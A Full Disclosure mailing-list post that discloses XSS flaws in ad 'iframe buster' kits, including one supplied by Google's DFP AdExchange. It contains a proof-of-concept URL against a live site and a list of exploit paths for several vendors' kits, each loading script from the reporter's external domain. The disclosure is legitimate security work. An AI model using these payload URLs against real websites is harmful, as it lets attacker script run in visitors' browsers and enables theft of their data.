[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [FD] Google supported XSS kit aka AdExchange iframe buster kit

To: fulldisclosure@xxxxxxxxxxxx
Subject: Re: [FD] Google supported XSS kit aka AdExchange iframe buster kit
From: Zmx <larouanne@xxxxxxxxx>
Date: Tue, 19 Dec 2017 17:09:26 +0100

Some more details:

1) The google article seems to link the problematic kit only in non-english
local (check the french version or spanish one)
2) In order for predicta to work, you should host your javascript on a
specific path: /mrm-ad/commons.js


2017-12-19 15:24 GMT+01:00 Zmx <larouanne@xxxxxxxxx>:

> Hi list,
>
> The DFP AdExchange service of Google (the service who provide ads) is
> distributing an "Iframe Buster Kit" in order to allow iframe ads to expand
> outside of the iFrame.
>
> This needs some bypass of the restriction applied to iframe, so Google
> provide a kit to install on your website:
> - Help Document: https://support.google.com/dfp_premium/answer/1074250
> - Kit: https://storage.googleapis.com/support-kms-prod/
> DB3CE51C3A5F783ED8198CDA753995FEB913
>
> The kit contains several html and js files to be hosted on your domains.
>
> Some of those files (still provide by Google, remember) contains very
> visible XSS code:
> One of them is "predicta" that simply allow you to pass the domain of from
> where to load the javascript.
>
>
> Quick proof of concept:
> - https://www.jobisjob.ch/predicta/predicta_bf.html?dm=bgtian.life
>
> As expandable ads allow website to gain more ads revenue, those kits is
> present in a lot of website.
>
> Other "iframe buster kit" exist that are not provided by Google, and some
> of them are also vulnerable.
>
> From my list I have:
> - /admotion/afa-iframe.htm?iq=https://bgtian.life/xss.js
> - /ipinyou/py_buster.html?pybust=https://bgtian.life/xss.js
> - /rockabox/rockabox_buster.html?rbbust=https://bgtian.life/xss.js (look
> like different version exist however)
> - /undertone/iframe-buster.html?ajurl=https://bgtian.life/xss.js
>
>
> Some source:
> - Code of predicta_bf.html provide by Google in the kit:
> https://pastebin.com/BggXDHNA
> - Code of https://bgtian.life/xss.js : https://pastebin.com/8GZTaJ4b
> - Code of rockabox: https://pastebin.com/xqhs3zyz
>
> Tr4L
>

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Follow-Ups:
- Re: [FD] Google supported XSS kit aka AdExchange iframe buster kit
  - From: Zmx

References:
- [FD] Google supported XSS kit aka AdExchange iframe buster kit
  - From: Zmx

Prev by Date: [FD] Google supported XSS kit aka AdExchange iframe buster kit
Next by Date: [FD] SSD Advisory – Huawei P8 wkupccpu debugfs Kernel Buffer Overflow
Previous by thread: [FD] Google supported XSS kit aka AdExchange iframe buster kit
Next by thread: Re: [FD] Google supported XSS kit aka AdExchange iframe buster kit
Index(es):
- Date
- Thread